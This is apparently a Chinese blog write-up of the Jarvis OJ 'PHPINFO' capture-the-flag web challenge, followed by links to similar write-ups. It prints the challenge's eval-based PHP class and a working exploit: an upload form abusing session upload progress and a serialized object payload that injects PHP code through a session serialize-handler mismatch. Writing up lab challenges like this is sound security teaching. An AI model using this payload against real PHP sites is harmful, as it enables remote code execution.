Jarvis OJ PHPINFO【审计代码反序列化】

最新推荐文章于 2024-05-15 02:33:48 发布
最新推荐文章于 2024-05-15 02:33:48 发布
阅读量3.9k 收藏 3
点赞数 1
文章标签: ctf jarvisoj PHPINFO 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/78430690
版权

原题地址:http://web.jarvisoj.com:32784/

 

其实这题一开始是没有任何思路的,感觉不存在任何数据传输接收点,后来看到了一篇wp,点这里

感觉瞬间打开了新世界,,,这里写篇write up记录下做题过程

 

首先打开题目页面直接获得源码:

 

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');#ini_set设置指定配置选项的值。这个选项会在脚本运行时保持新的值,并在脚本结束时恢复。 
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

 

 

 

这题的突破点在哪里,没错,就是我备注的那块ini_set('session.serialize_handler', 'php');

查了下手册:

php大于5.5.4的版本中默认使用php_serialize规则

 

通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。

 

由phpinfo()页面继续可知,session.upload_progress.enabled为On。

当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据。所以可以通过Session Upload Progress来设置session。

 

但是,这时就有一个问题,在题目代码中,没有某个值是用来接受我们传入的数据,并储存到$_SESSION中的。

其实我们是有办法传入$_SESSION数据的,这里就利用到了|的反序列化问题

思路很明显了,我们需要构造一个上传和post同时进行的情况,代码如下:

 

<!DOCTYPE html>
<html>
<head>
	<title>test XXE</title>
	<meta charset="utf-8">
</head>
<body>
	<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"><!-- 	

不对字符编码-->
	    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
	    <input type="file" name="file" />
	    <input type="submit" value="go" />
	</form>
</body>
</html>


注意enctype属性:

 

 

 

接下来考虑序列化:

 

<?php
class OowoO
{
    public $mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj = new OowoO();
$a = serialize($obj);

var_dump($a);


#|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}


注释是考虑到反转义,和序列化之后的结果,bp抓包,将file替换,结果如下:

 

 

 

 

进一步更改,可获得flag

 

总结:多翻翻神奇的php手册,,,

 

 

Sp4rkW
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHPINFO(jarvisoj)
Mikasa
04-19 812
今天做题的时候做了这一道。。刷新了对反序列化的认识。。 这道题考察了关于session序列化选择器的漏洞。。 参考文章:https://www.jb51.net/article/107101.htm 首先先介绍一下,关于session反序列化的三种机制: 首先在php.ini中关于session的设置: session.save_path="" #设置session的储存路径 sess...
Jarvis OJ PHPINFO
沐目的博客
08-12 326
1.知识点 1.1php处理器 PHP内置了三个处理器,用来对session进行序列化和反序列化。在php 5.5.4以前默认选择的是php,5.5.4之后就是php_serialize,这里面是php_serialize。 php处理器: PHP php_binary php_serialize (php>=5.5.4) 1.2反序列化漏洞 这个配置可以在php.ini文件中的“se...
CTF从入门到提升(十四)session phpinfo包含及例题详解_ctfphpinfo界面题(1)
最新发布
m0_60707660的博客
05-15 689
本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?15、讲述一下LVS三种模式的工作过程?
Jarvis OJ WEB PHPINFO
A_dmin的博客
04-13 440
Jarvis OJ WEB PHPINFO session反序列化的题目,很少做,貌似也不会,这里记一下 打开题目可以得到源码: <?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; ...
jarvisoj web-phpinfo
weixin_46578840的博客
09-10 107
打开题目地址得到源码 这题的突破点就是 ini_set(‘session.serialize_handler’, ‘php’); 查了下手册: php大于5.5.4的版本中默认使用php_serialize规则 通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。 再看到 当一个上传在处理中,同时POST一个与INI中设置的session.upl
jarvis oj 神盾局的秘密 wp
欢迎来到神林的博客
09-12 379
jarvis oj 中的反序列化 收集信息: 发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php ...
JarvisOJ.docx
03-10
JarvisOJ Web 中,我们学习到了如何使用 JavaScript 代码分析来获取 FLAG。我们可以使用 JavaScript 代码分析工具来分析 app.js 文件,从而找到加密逻辑。 八、Web 开发 在 JarvisOJ Web 中,我们学习到了如何...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis:贾维斯家庭自动化
05-01
贾维斯家庭自动化 语音控制的家庭自动化系统,以及用于做酷事的插件。 它有两个可用的侦听器: SNOWBOY它使用令人惊叹的snowboy产品( )等待关键字,然后根据预定的json格式执行操作。 WATSON STT它会打开一个...
jarvisJarvis家庭自动化
02-05
Jarvis家庭自动化 注意:经过3年的中断,我终于可以升级Jarvis,使其可以与新版本的Home Assistant一起使用。 我可能要花点时间才能使所有功能正常工作,但我会尽一切努力保持更新。 Jarvis是一个家庭助理( )...
jarvis:Jarvis框架
05-13
Jarvis是轻量级的管理框架 一,职能 登录(多租户,切换租户) 登出 登记 重设密码 轮廓 租户信息 租户管理(CRUD) 组织管理(CRUD,权限数据) 帐户管理(CRUD,角色,锁定/解锁) 角色管理(CRUD,权限功能) 标签管理(CRUD) 设置管理(RU) 二。 技术 框架:ASP.NET Core 3.1 ORM:实体框架核心3.1,Dapper 数据库:MySQL,MSSQL 身份验证:JWT 缓存:内存,Redis 讯息:RabbitMQ 前端:AngularJS 1.6组件库(多主题,覆盖控制器/模板/服务) API文件:Swagger 默认主题:AdminLTE RestfulAPI 三, 建筑学 设计模式 UnitOfWork,存储库模式 观察者模式 抽象工厂模式 单例模式 责任链 基于Microsoft的依赖注入
jarvisoj Inject & PHPINFO
river
03-26 499
Jarvisoj Inject 扫描后台得到index.php~ <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker(); $sq...
详解OJ(Online Judge)中PHP代码的提交方法及要点【举例:ZOJ 1001 (A + B Problem)】
weixin_33989780的博客
05-05 234
详解OJ(Online Judge)中PHP代码的提交方法及要点 Introduction of How to submit PHP code to Online Judge Systems Introduction of How to commit submission in PHP to Online Judge Systems 在目前常用的在线oj中...
php实现在线oj,详解OJ(Online Judge)中PHP代码的提交方法及要点
weixin_39608300的博客
03-18 547
详解OJ(Online Judge)中PHP代码的提交方法及要点Introduction of How to submit PHP code to Online Judge SystemsIntroduction of How to commit submission in PHP to Online Judge Systems在目前常用的在线oj中,codeforces、spoj、uva、zoj...
Jarvis OJ babyphp
沐目的博客
10-15 331
源码泄露加任意命令执行 一、知识点: 1. 源码泄露 在一些网站中,可能会用备份文件,我们可以通过一些工具把他给下载下来。 链接:https://pan.baidu.com/s/1s_3Phgww6nAFKVhw-GTDZw 提取码:87ax 2.assert() 这个函数和eva()这个函数差不多,都可以执行命令,也是高危函数。 二、实战: 首先运行那个脚本,好像只能在Linux上跑,运行完后我...
Jarivas OJ LOCALHOST
沐目的博客
04-18 156
Jarivas OJ LOCALHOST (http://web.jarvisoj.com:32774/)题目连接 这题需要知道两个知识点:(一)X-Forwarded-For.如果想理解的清楚一些,可以自行百度,我就简单书一下自己的理解,肯定不太对,但是好理解一些。它是在HTTP请求中的一个参数,它可以传递我们电脑的IP地址,因此服务器可以通过它来得知我们的IP。(二)127.0.0.1表示的是...
小米OJ #149:Game PHP实现
qq_33388707的博客
11-24 243
小米OJ
JARVIS项目源码分析 - awesome_chat.py代码分析1
sisiair的博客
04-05 246
我们引入了一个协作系统,该系统由作为控制器的 LLM和作为协作执行者的众多专家模型组成(来自 HuggingFace Hub)。任务规划:使用ChatGPT分析用户的请求,了解他们的意图,并将其拆解成可能的可解决任务。1、首先看一下用户输入的数据存储格式,系统定义了一个列表字典,参考test函数中的数据调用。主要完成2个功能:(1)获取用户的输入信息,存储为字典列表的数据格式。任务执行:调用并执行每个选定的模型,并将结果返回给 ChatGPT。2、再看mian函数,执行调用了一个cli_chat函数。
ctf php反序列化
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击中,攻击者通常会在Cookie、GET或POST参数中注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值